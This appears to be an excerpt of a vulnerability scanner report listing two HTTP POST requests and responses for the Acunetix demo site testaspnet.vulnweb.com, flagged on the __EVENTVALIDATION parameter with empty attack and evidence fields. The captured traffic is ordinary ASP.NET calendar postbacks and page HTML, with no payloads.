Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1171 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,171 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8354&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgDAz1acxtoIZGRkJgZNuiX9HZIRF53KMqGs%2FQs%2Bkuw%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL%2B4cq1CgLHkIz%2BDgL%2BkLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gIC%2B6T5jQoC%2B6T5jQoC%2B6TtoAMC%2B6TtoAMC%2B6SBxwwC%2B6SBxwwC%2B6T1rAkC%2B6T1rAkC%2B6TpwwIC%2B6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3%2BQ8C3Mu3%2BQ8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5%2BoCAtzL5%2BoCAtzL29MPAtzL29MPAtzLz%2FYIAtzLz%2FYIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODA8LF6FeMR34bWIAnv5Ajk8Fvufyu
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:23:19 GMT Content-Length: 12617
Response Body - size: 12,617 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgDAz1acxtoIZGRkJgZNuiX9HZIRF53KMqGs/Qs+kuw=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL+4cq1CgLHkIz+DgL+kLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gIC+6T5jQoC+6T5jQoC+6TtoAMC+6TtoAMC+6SBxwwC+6SBxwwC+6T1rAkC+6T1rAkC+6TpwwIC+6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3+Q8C3Mu3+Q8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5+oCAtzL5+oCAtzL29MPAtzL29MPAtzLz/YIAtzLz/YIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODA8LF6FeMR34bWIAnv5Ajk8Fvufyu" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">November 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8345')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8346')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8347')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8348')" style="color:Black" title="November 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8349')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8350')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8351')" style="color:Black" title="November 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8352')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8353')" style="color:Black" title="November 14">14</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8354')" style="color:White" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8355')" style="color:Black" title="November 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8356')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8357')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8358')" style="color:Black" title="November 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8359')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8360')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8361')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8362')" style="color:Black" title="November 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8363')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8364')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8365')" style="color:Black" title="November 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1065 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,065 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8372&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAEA%2FUsHU2ghkZGRjclqqbpE9oAHgtb5fFGylP84oBQ%3D%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL%2F%2F5qBBgL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBC6tl6uZAd8Bue0fFUsGlhw3nQUj
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:56:16 GMT Content-Length: 12607
Response Body - size: 12,607 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAEA/UsHU2ghkZGRjclqqbpE9oAHgtb5fFGylP84oBQ==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL//5qBBgL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBC6tl6uZAd8Bue0fFUsGlhw3nQUj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:White" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
